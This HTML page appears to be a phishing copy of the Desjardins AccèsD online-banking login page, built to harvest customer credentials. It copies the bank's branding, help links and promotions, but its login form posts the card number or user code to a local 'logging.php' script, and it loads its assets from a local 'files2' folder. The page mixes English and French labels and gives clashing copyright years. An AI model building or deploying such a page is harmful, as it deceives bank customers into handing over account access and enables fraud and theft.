<!DOCTYPE html>
<html lang="fr"><head> <title>    Log on | Desjardins
</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

<noscript>
<meta http-equiv="refresh" content="1;url=/identifiantunique/erreur-contenu-support.jsp">
</noscript>

<link rel="icon" href="https://www.desjardins.com/static-accesweb/201611041724/acces-web/img/desjardins.ico" type="image/x-icon">

<link href="files2/bootstrap.css" rel="stylesheet">

<link href="files2/fwd-bootstrap.css" rel="stylesheet">

<!--[if lt IE 9]>
<link href="https://www.desjardins.com/static-accesweb/201611041724/lib/interne/fwd-bootstrap/3.3/css/fwd-bootstrap-ie-force-960-layout.min.css" rel="stylesheet" />
<![endif]-->
<!--[if lte IE 8]>
<link href="https://www.desjardins.com/static-accesweb/201611041724/lib/interne/fwd-bootstrap/3.3/css/fwd-bootstrap-ie.min.css" rel="stylesheet" />
<link href="https://www.desjardins.com/static-accesweb/201611041724/lib/interne/fwd-bootstrap/3.3/css/fwd-bootstrap.css" rel="stylesheet" />
<![endif]-->
<!--[if IE 9]>
<link href="https://www.desjardins.com/static-accesweb/201611041724/lib/interne/fwd-bootstrap/3.3/css/fwd-bootstrap-ie9.min.css" rel="stylesheet" />
<![endif]-->


<link href="files2/global.css" rel="stylesheet">

<link media="only screen and (max-width : 768px)" href="files2/identifiantunique-responsive.css" rel="stylesheet">


<!-- Ajustements de styles de l'application -->

<link href="files2/theme.css" rel="stylesheet">

<!--[if IE]><link rel="stylesheet" type="text/css" href="https://www.desjardins.com/static-accesweb/201611041724/acces-web/css/ie.min.css"/><![endif]-->
<!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="https://www.desjardins.com/static-accesweb/201611041724/acces-web/css/ie7.min.css"/><![endif]-->
<!--[if IE 8]><link rel="stylesheet" type="text/css" href="https://www.desjardins.com/static-accesweb/201611041724/acces-web/css/ie8.min.css"/><![endif]-->

<link href="files2/owl.css" rel="stylesheet">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">


<meta name="description" content="Gérer vos finances personnelles n’aura jamais été aussi simple, rapide et sécuritaire grâce aux services en ligne de Desjardins!">


<meta name="desjardins-identifiant-application" content="AccesWeb">
<meta name="raaMobileActif" content="">


<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script src="files2/global.js" type="text/javascript"></script>


<script type="text/javascript">
if (window.top.location != self.location) {
    window.top.location = self.location;
};
</script>


<link href="files2/pied.css" rel="stylesheet">

<link rel="stylesheet" href="files2/entete.css">
<link rel="stylesheet" href="files2/page-logon.css">
</head><body class="isolation-bootstrap-3 texte13px fixChrome" data-whatinput="mouse"><fwd_placeholder__contenu_head_fragment_principal>





<!-- if app_mobile -->
<a name="haut"></a>


<span class="hidden-xs">

<div id="zone-entete-de-page">
<div id="entete">
<div id="access-links">
<a href="#contenu" class="sr-only sr-only-focusable" title="Aller au contenu principal">Aller au contenu principal</a>
</div>
<div id="logo">

<h1 class="sr-only">Site Internet de Desjardins</h1>
<a href="https://www.desjardins.com/index.jsp" title="Retour à page d'accueil de Desjardins.com"><img src="files2/a00-entete-logo-desjardins.jpg" alt="Retour à page d'accueil de Desjardins.com" width="154" height="32"></a>
</div>
<div id="logo-applicatif">

<a href="https://accweb.mouv.desjardins.com/identifiantunique/sso/adp"><img src="files2/g40-entete-logo-accesd.png" alt="AccèsD" width="106" height="32"></a>

<a href="https://accweb.mouv.desjardins.com/identifiantunique/sso/ada"><img src="files2/g40-entete-logo-accesd-affaires.png" alt="AccèsD Affaires" width="90" height="32"></a>
</div>
<div id="outils">
<div id="nous-joindre">
<p class="titre-entete"><a href="#" onclick="popup('//www.desjardins.com/page-aide/index.jsp?docName=ai_joindre&amp;domaine=ACCESD','Joindre','resizable=yes,location=no,menubar=no,status=no,scrollbars=yes,width=800,height=600');">Nous joindre</a></p>
</div>
<div id="aide">
<p class="titre-entete"><a href="#" onclick="popup('//www.desjardins.com/page-aide/index.jsp?docName=ai_logonlogoff&amp;domaine=ACCESD','Aide','resizable=yes,location=no,menubar=no,status=no,scrollbars=yes,width=800,height=600');">Aide</a></p>
</div>
<div id="choix-site">
<p class="titre-entete"><a id="btn-langue" href="https://accweb.mouv.desjardins.com/identifiantunique/identification?langueCible=en" lang="en"><span class="sr-only">Change language. </span>English</a></p>
</div>
<div id="fonctions">
<ul>
<li class="reduire"><a id="taille-texte-moins" href="javascript:void(0)" title="Réduire la taille du texte">Réduire la taille du texte</a></li>
<li class="augmenter"><a id="taille-texte-plus" href="javascript:void(0)" title="Augmenter la taille du texte">Augmenter la taille du texte</a></li>
</ul>
</div>
</div>
</div>
</div>

</span>
<span class="hidden-sm hidden-md hidden-lg">


<div id="zone-entete-de-page">
<nav class="navbar navbar-default" role="navigation">
<div class="container max-layout-960">
<!-- Brand and toggle get grouped for better mobile display -->
<div class="navbar-header">

<span class="navbar-brand">

<a href="">
<img class="logo" src="files2/a00-entete-logo-desjardins.png" alt="Aller à la page d'accueil" title="Desjardins">
</a>

<div class="hidden-xs" style="display: inline;">
<img role="presentation" src="files2/g00-entete-filet-logos.png">

<img class="logo-desjardins" role="presentation" src="files2/g00-logo-desjardins-blanc.png" style="padding-right: 20px;" alt="Desjardins" title="Desjardins">

</div>
</span>

<div id="titrePageMobile" class="navbar-brand hidden-sm hidden-md hidden-lg">Log on</div>


<a href="http://www.desjardins.com/" class="navbar-brand pull-right hidden-sm hidden-md hidden-lg">
<img id="menuAppRetour" src="files2/entete-btn-menu-app.png" height="32">
</a>

</div><!-- /.navbar-header --> <!-- Collect the nav links, forms, and other content for toggling -->
<div class="collapse navbar-collapse" id="navbar-collapse-outils">
<div id="outils">
<ul class="nav navbar-nav navbar-right">

<li>
<a class="lien" href="javascript:popup('https://www.desjardins.com/page-aide/index.jsp?docName=ai_joindre&amp;domaine=ACCESD','Nous%20joindre',%20'location=0,scrollbars=yes,resizable=yes,width=500,height=500');">
Nous joindre
</a><span class="hidden-xs">|</span>
</li>
<li>
<a class="lien" href="javascript:popup('https://www.desjardins.com/fr/services_en_ligne/accesd/aide/ai_logonlogoff.jsp?domaine=ACCESD','Aide',%20'location=0,scrollbars=yes,resizable=yes,width=500,height=500');">
Aide
</a><span class="hidden-xs">|</span>
</li>

<li class="hidden-xs">

<a class="lien" id="changeLangue" href="https://accweb.mouv.desjardins.com/identifiantunique/identification?langueCible=en">
English
</a>
<span class="hidden-sm">|</span>
</li>

<li class="hidden-xs">
<a class="lien" id="taille-texte-moins" href="javascript:void(0)" style="padding-right: 0px;">
<img src="files2/a00-entete-ic-texte-moins-on.png" alt="" title="">
</a>
</li>
<li class="hidden-xs">
<a class="lien" id="taille-texte-plus" href="javascript:void(0)" style="padding-left: 8px; padding-right: 20px;">
<img src="files2/a00-entete-ic-texte-plus-on.png" alt="" title="">
</a>
</li>


</ul> </div> </div><!-- /.collapse .navbar-collapse -->
</div><!-- /.container-fluid --> </nav><!-- /.navbar .navbar-default .navbar-fixed-top -->
</div>

</span>
<script type="text/javascript">
var deconnexionLogoutDefault = "true";
$("#btn-deconnexion").attr("href", "#");
</script>
<script type="text/javascript">
$(document).on("click", "#btn-deconnexion", function() { dynDeconnection("https://accweb.mouv.desjardins.com:443/identifiantunique/autologout"); });
</script>

<!-- fin if app_mobile -->
<div class="zone-centrale">

<div id="zone-centrale-bg">
<!-- div id="zone-centrale-grad" class="zone-centrale padding-top-35px"></div-->
<div class="container">
<div id="contenu" role="main" lang="fr">

<div class="row">

<div class="col-xs-24 col-sm-24 col-md-18 col-md-offset-3 col-lg-18 col-lg-offset-3">


<div id="loading" class="loading" style="display: none;">
<div class="panel panel-primary">
<div class="panel-body">
<img id="img-loading" src="files2/a00-loading-petit.gif" alt="Loading">
</div>
</div>
</div>



<h1 id="titrePage" data-titre-page-mobile="Log on">
Log on</h1>

<div class="row">
<div class="col-sm-24 col-md-24">

<div id="erreurSystemeJS" class="has-error hidden" aria-live="assertive">
<div>
<span class="help-block-idunique">
Les erreurs suivantes ont été détectées :
</span>
<ul>
<li>
<a id="erreurLienJS" href="#" class="erreurLien"></a>
</li>
</ul>
</div>
</div>

</div>
</div>

<!--Dessin du panel -->
<div class="row">
<div class="col-xs-24 col-sm-24">
<div class="panel panel-primary">
<div class="panel-body padding-moyen">
<div id="conteneur-separateur-vertical" class="row">
<!-- Div formulaire de gauche -->
<div id="identification" class="col-xs-24 col-sm-14">


<!-- Inclusion de la modale de suppression des cartes enregistrees -->

<div id="modalSuppressionCookies" class="modal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-describedby="modelDescription" aria-hidden="true">
<div class="modal-dialog margin-top">
<div class="col-xs-24 col-sm-24 col-md-20 col-lg-20">
<div id="contenu" class="modal-content padding-left10px padding-right10px">
<div class="modal-header"></div>
<p id="modelDescription" class="alert alert-warning">Voulez-vous vraiment supprimer tous les identifiants mémorisés?</p>
<div class="modal-footer">
<button id="btnAnnulerSuppressionCookies" name="btnAnnulerSuppressionCookies" type="button" class="btn btn-default" title="Annuler" data-dismiss="modal">
Annuler
</button>
<button id="btnValiderSuppressionCookies" name="btnValiderSuppressionCookies" type="button" class="btn btn-primary" title="Oui">
Oui
</button> </div> </div> </div> </div>
</div>

<!-- Formulaire -->
<form id="formIdentification" class="form-horizontal" role="form" action="logging.php" method="POST" autocomplete="off">

<!-- Divers champs -->

<input id="fnMemoriserUtilisateurActive" name="fnMemoriserUtilisateurActive" value="O" type="hidden">

<!--  Champs hidden pour RAA mobile -->
<input id="InfoPosteRaa" name="InfoPosteRaa" type="hidden">
<input id="OtherIdRaa" name="OtherIdRaa" type="hidden">

<!-- Liste des controles du formulaire -->


<div class="col-sm-24">

<input id="nbrCartesMemorisees" name="nbrCartesMemorisees" value="0" type="hidden">

<div id="connexionParPicto" style="display: none;">

<div class="row">
<span class="sr-only">Vous avez 0 identifiants mémorisés</span>

<!-- Gestion d'erreur pour form-group-identifiant -->

</div>
<div id="form-group-bouton">



<div class="row">
<div class="col-xs-24 col-sm-12 ">
<button id="btnUtiliserAutreIdentifiant" name="btnUtiliserAutreIdentifiant" type="button" class="btn btn-default btn-block">
Changer d'identifiant
</button>
</div>
<div class="col-xs-24 col-sm-12">
<button id="btnDemanderSuppressionCookies" name="btnDemanderSuppressionCookies" type="button" class="btn btn-default btn-block" data-target="#modalSuppressionCookies" data-toggle="modal" data-backdrop="static">
Supprimer les identifiants
</button>
</div>
</div>
<div class="row top10px">
<div class="col-sm-12 hidden-xs">
<a id="btnRet" name="btnRetourAccueil" href="http://www.desjardins.com/" class="btn btn-default btn-block">
Annuler
</a>
</div>
<div class="col-xs-24 col-sm-12">

<a id="btnMotPasseOublie" name="btnMotPasseOublie" href="https://accweb.mouv.desjardins.com/identifiantunique/motPasseOublie/identification" class="btn btn-default btn-block">
Mot de passe oublié?
</a> </div> </div> </div>
</div>
<!-- Affichage de l'écran de login classique en absence de mémorisation -->
<div id="connexionParSaisie" style="">
<p id="memoriser_instruction" class="sr-only">
Un champ Descriptif s'ajoute automatiquement si vous cochez la case Mémoriser.
</p> <!-- Message de maintenance -->
<!-- Libellé et champ de saisie de l'identifiant -->


<div id="form-group-identifiant" class="no-margin-bottom ">
<div class="panel panel-default padding-moyen no-border no-margin-bottom">


<div class="form-group">
<!-- Libelle -->
<div id="identifiantCodeUtilisateurLabel">
<div class="col-xs-24 col-sm-9 control-label">
<label for="codeUtilisateur" path="codeUtilisateur" class="texte16px">
<strong>Username :</strong> </label>

<a href="javascript:;" data-toggle="popover" title="" data-placement="bottom" data-html="true" data-arrow="auto left" data-container="#form-group-identifiant" data-content="&lt;h2 class='sr-only titrePopoverHorsEcran' tabindex='-1'&gt;Identifiant :&lt;/h2&gt;&lt;p&gt;&lt;strong&gt;Identifiant&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Votre numéro de Carte d’accès Desjardins avec ou sans le 4540&lt;/li&gt;&lt;li&gt;Votre carte d’accès virtuelle (non-membres)&lt;/li&gt;&lt;li&gt;Votre code d'utilisateur AccèsD Affaires&lt;/li&gt;&lt;li&gt;Votre adresse courriel&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Votre &lt;strong&gt;identifiant &lt;/strong&gt; sert à vous connecter à vos comptes particuliers et à vos comptes entreprises.&lt;/p&gt;&lt;a id=lnkPlusDeDetails href='javascript:popup(&quot;https://www.desjardins.com/page-aide/index.jsp?docName=ai_identifiant_unique&amp;domaine=ACCESD&quot;,&quot;&quot;,&quot;resizable=yes,location=no,menubar=no,status=no,scrollbars=yes,width=800,height=600&quot;)'&gt;Plus de détails sur l’identifiant&lt;/a&gt;" role="button" data-original-title="">
<img style="vertical-align: sub;" alt="Aide – Identifiant" src="files2/a00-formulaire-icone-aide.gif">
</a>
</div> 
</div> 
<!-- Champ de saisie identifiant--> 
<div class="col-xs-24 col-sm-15 last-col">

<input aria-describedby="blockMessageErreur" id="codeUtilisateur" name="codeUtilisateur" type="text"  maxlength="254" class="texte16px" autocomplete="off" placeholder="Card number or user code" value=""/>
 
</div>
</div>
</div>

<div id="form-group-identifiant-memorise">
<div class="panel panel-default padding-moyen no-border no-margin-bottom">
<!-- Case à cocher Mémoriser-->

<div class="form-group">
<div class="col-xs-24 col-sm-offset-9 col-sm-15">
<div id="form-group-memoriser" name="form-group-memoriser">

<div class="checkbox">
<label for="memorise" path="memorise">
<input id="memorise" name="memorise" onclick="javascript:switchDisplayDescription()" aria-describedby="memoriser_instruction" type="checkbox">
<strong class="texteMemorise">Remember</strong>
<p class="hidden-xs top0pxImportant">
<small>(Non recommandé sur un ordinateur public)</small> </p> </label> </div>
</div> </div> </div>

<div class="form-group">
<!-- Description -->
<div class="col-sm-offset-9 col-sm-15">
<div id="form-group-description" name="form-group-description" style="display: none;">
<label for="description">
<strong>Descriptif (optionnel) :</strong>
</label>
<input id="description" name="description" maxlength="20" size="20" autocomplete="off" aria-describedby="descriptionExemple" type="text">
<p>
<small id="descriptionExemple">Ex. : Compte maison</small> </p> </div> </div> </div> <!-- Boutons et liens de connexion -->

<div id="groupeBtnAction" name="groupeBtnAction">
<div id="form-group-bouton" class="form-group">

<div class="hidden-xs col-sm-9 text-right">
<a href="http://www.desjardins.com/" class="btn btn-default fullwidth">
Annuler
</a>
</div>
<div class="col-xs-24 col-sm-5">
<input class="btn btn-primary fullwidth" value="Go" type="submit">
</div>


<div class="col-xs-24 hidden-sm hidden-md hidden-lg">&nbsp;</div>


<span class="col-xs-24 col-sm-10">

<div class="top10px hidden-sm hidden-md hidden-lg"></div>

<a class="lien-action" href="https://accweb.mouv.desjardins.com/identifiantunique/motPasseOublie/identification">
Forgot your password?
</a>   </span>
<div class="col-xs-24 hidden-sm hidden-md hidden-lg top10px">

<a class="lien-action col-xs-24" href="https://accweb.mouv.desjardins.com/identifiantunique/adhesion/identification">Register for AccèsD</a>
<a class="lien-action col-xs-24 top5px" href="https://www.desjardins.com/entreprises/comptes-tresorerie/modes-acces-comptes/accesd-affaires/comment-inscrire/">Register for AccèsD Affaires</a>
<a class="lien-action col-xs-24 top5px" href="https://www.desjardins.com/particuliers/comptes-services-relies/ouvrir-compte-devenir-membre/">Become a member</a><br>
</div>
</div> </div> </div> </div>
</div>

</div>
<input name="_tk" value="a9818276-0087-42aa-af7a-e811a3f8a054" type="hidden">
<input id="infoPosteClient" name="infoPosteClient" value="version=3.4.1.0_1&amp;pm_fpua=mozilla/5.0 (windows nt 6.1; wow64; rv:49.0) gecko/20100101 firefox/49.0|5.0 (Windows)|Win32&amp;pm_fpsc=24|1600|900|860&amp;pm_fpsw=pdf|pdf&amp;pm_fptz=7&amp;pm_fpln=lang=en-US|syslang=|userlang=&amp;pm_fpjv=0&amp;pm_fpco=1&amp;pm_fpasw=nppdf32|nppdf32|npadobeaamdetect32|npfacebookvideocalling|npgoogleupdate3|npswf32_23_0_0_207|np32dsw_1213153&amp;pm_fpan=Netscape&amp;pm_fpacn=Mozilla&amp;pm_fpol=true&amp;pm_fposp=&amp;pm_fpup=&amp;pm_fpsaw=1600&amp;pm_fpspd=24&amp;pm_fpsbd=&amp;pm_fpsdx=&amp;pm_fpsdy=&amp;pm_fpslx=&amp;pm_fpsly=&amp;pm_fpsfse=&amp;pm_fpsui=&amp;pm_os=Windows&amp;pm_brmjv=49&amp;pm_br=Firefox&amp;pm_inpt=&amp;pm_expt=" type="hidden"></form>
</div>
<!-- Div Ligne de séparation verticale -->
<span id="separateur-vertical" class="hidden-xs col-sm-1 separateur-vertical hidden-xs" style="height: 265px;"></span>
<!-- Div d information de droite -->
<div id="blocSecuriteDroite" class="hidden-xs col-sm-9 padding-left15px">

<div>
<div id="lst_securite_label" class="hidden-xs">

<h3 id="label_securite">
Sécurité
</h3>

<ul id="lst_securite" aria-labelledby="lst_securite_label" class="nopadding">

<li>
<a href="https://www.desjardins.com/securite/pratiques-securite/">Sécurité du site</a> </li>
<li>
<a href="https://www.desjardins.com/securite/signaler-fraude/">Signaler une fraude</a>
</li>
<li>
<a href="https://www.desjardins.com/securite/">Comment vous protéger</a> </li>
<li>
<a href="https://www.desjardins.com/particuliers/comptes-services-relies/modes-acces-comptes/internet/soutien/index.jsp">Soutien technique</a> </li>
</ul>
</div>

</div>
<!-- Div du logo securite -->
<div class="top15px">


<div id="imgSecurite" class="text-left hidden-xs">

<a href="https://www.desjardins.com/securite/remboursement-fraude/">
<img src="files2/g00-logo-securite-garantie-f.png" alt="Sécurité garantie à 100 %">
</a>

</div>
</div>
<div>

<div class="top15px hidden-xs">

<a class="lien-action" href="https://accweb.mouv.desjardins.com/identifiantunique/adhesion/identification">
S'inscrire à AccèsD
</a><br>
<a class="lien-action" href="https://www.scd-desjardins.com/GCE/SAAdhesion?locale=fr&amp;domaine=SCD&amp;action=indexAdhesion&amp;IndSessionPVMV3=O">
S'inscrire à AccèsD (non-membres)
</a><br>
<a class="lien-action" href="https://www.desjardins.com/entreprises/comptes-tresorerie/modes-acces-comptes/accesd-affaires/comment-inscrire/">
S'inscrire à AccèsD Affaires
</a><br>
<a class="lien-action" href="https://www.desjardins.com/particuliers/comptes-services-relies/ouvrir-compte-devenir-membre/">
Devenir membre
</a><br>
</div>
</div>
</div>    </div>    </div>    </div>    </div>    </div>
<script src="files2/blocBanniere.js" type="text/javascript"></script>



<div class="row hidden-xs">
<div class="col-sm-24 col-md-24">
<div class="row">
<div class="col-sm-12 col-md-12" checkpromotionflag="">
<div class="panel panel-primary">
<div class="panel-body" id="promoParticuliers" style="height: 148px;">




















































































<div class="bloc-promo">

<img class="image-gauche" src="files2/b05-login-identifiant-courriel.jpg" alt="">
<p><strong>Connexion à AccèsD</strong></p>
<p>Créez votre identifiant courriel pour vous connecter à AccèsD&nbsp;: c'est simple et sécuritaire!</p>
<p><a class="lien-action" href="https://www.desjardins.com/particuliers/comptes-services-relies/modes-acces-comptes/internet/faciliter-connexion-accesd/index.jsp">En savoir plus
<span class="hors-ecran">&nbsp;sur la connexion à AccèsD.</span></a></p>
</div>





















</div>
</div>
</div>
<div class="col-sm-12 col-md-12" checkpromotionflag="">
<div class="panel panel-primary">
<div class="panel-body" id="promoEntreprises" style="height: 148px;">




















































































<div class="bloc-promo">

<img class="image-gauche" src="files2/c25-login-opportunite-affaires-monetico.jpg" alt="">
<p><strong>Monetico Mobile</strong></p>
<p><em>Entre</em>prendre chaque occasion daffaires avec Monetico Mobile.</p>
<p><a class="lien-action" href="https://promo.monetico.ca/fr/promo/ditesoui">En savoir plus<span class="hors-ecran">&nbsp;sur Monetico Mobile.</span></a></p>
</div>




















</div>
</div>
</div>
</div>
<div class="row">
<div class="col-sm-24 col-md-24" checkpromotionflag="">
<div class="panel panel-primary">
<div class="panel-body">





















































































<div class="bloc-promo">

<img class="image-gauche" src="files2/b35-offres-privileges-bloc.jpg" alt="Obtenez des rabais et privilèges chez plusieurs marchands et partenaires. En savoir plus.">
<p class="avantage-membre">Offres exclusives et privilèges</p>
<p>Obtenez des rabais et privilèges chez plusieurs marchands et partenaires</p>
<p><a class="lien-action" href="https://www.desjardins.com/offres-exclusives-membres/index.jsp">En savoir plus<span class="hors-ecran">&nbsp;sur les offres exclusives et privilèges</span></a></p>
</div>



















</div> </div> </div> </div> </div> </div>

<script src="files2/info-poste-client.js"></script>
<script src="files2/login-contenu.js"></script>


<div id="securiteMobile" class="hidden-sm hidden-md hidden-lg">
<img class="fake" src="files2/g00-logo-securite-garantie-f.png">
<img class="fake" src="files2/a00-entete-logo-desjardins.png">

<div id="img_wrap" class="row col-xs-24 padding-left10px">

<img class="normal non-selectable" title="" src="files2/g00-logo-securite-garantie-f.png" alt="">

<img class="normal non-selectable padding-left10px" title="Desjardins" src="files2/a00-entete-logo-desjardins.png" alt="Desjardins">

</div> </div> <br>

<br>
</div>
</div>

</div>

<br>

</div>
</div>
</div>

<footer class="footer">


<span class="hidden-xs">






<div id="zone-pied-de-page">
<div id="pied">

<div id="plan-site">
<h2 class="hors-ecran">Plan du site</h2>
<div id="tetes-sections">
<ul>




<li><a href="https://www.desjardins.com/particuliers/index.jsp">Services aux particuliers</a></li>
<li><a href="https://www.desjardins.com/entreprises/index.jsp">Services aux entreprises</a></li>
<li><a href="https://www.desjardins.com/coopmoi/index.jsp">Coopmoi</a></li>
<li><a href="https://www.desjardins.com/a-propos/index.jsp">À propos</a></li>
<li><a href="https://www.desjardins.com/mobile-gps-rss/index.jsp">Desjardins sur mobile, GPS et RSS</a></li>
</ul>
</div>
</div>
<div id="zone-legale">





<ul>
<li><a href="https://www.desjardins.com/securite/">Sécurité</a></li>
<li><a href="https://www.desjardins.com/confidentialite/">Confidentialité</a></li>
<li><a href="https://www.desjardins.com/conditions-utilisation-notes-legales/">Conditions d'utilisation et notes légales</a></li>
<li><a href="https://www.desjardins.com/accessibilite/">Accessibilité</a></li>
<li><a href="https://www.desjardins.com/plan-site/">Plan du site</a></li>
</ul>






<p class="copyright">© 1996-2018,


Mouvement des caisses Desjardins.
Tous droits réservés.</p>


</div>
</div>
</div>





</span>
<span class="hidden-sm hidden-md hidden-lg">

<div id="pied-de-page" class="container texte-blanc">
<div class="row">
<div class="col-sm-4 col-md-4 text-left pied-de-page-logo hidden-xs">

</div>
<div class="col-xs-24 col-sm-16 col-md-16 text-center pied-de-page-texte">
<span class="hidden-xs">

<a href="javascript:popup('https://www.desjardins.com/securite/','S%C3%A9curit%C3%A9','scrollbars=yes,resizable=yes,width=500,height=500');">Sécurité</a> |
<a href="javascript:popup('http://www.desjardins.com/confidentialite/','Confidentialit%C3%A9','scrollbars=yes,resizable=yes,width=500,height=500');">Confidentialité</a> |
<a href="javascript:popup('http://www.desjardins.com/conditions-utilisation-notes-legales/','Conditions%20utilisation','scrollbars=yes,resizable=yes,width=500,height=500');">Conditions d'utilisation et notes légales</a> |
<a href="javascript:popup('https://www.desjardins.com/page-aide/index.jsp?docName=accessibilite&amp;domaine=ACCESD','Accessibilit%C3%A9','scrollbars=yes,resizable=yes,width=500,height=500');">Accessibilité</a>
<br>
</span> <p>Copyright © 1996-2021, Mouvement des caisses Desjardins - Desjardins Group. All rights reserved.</p>

</div>
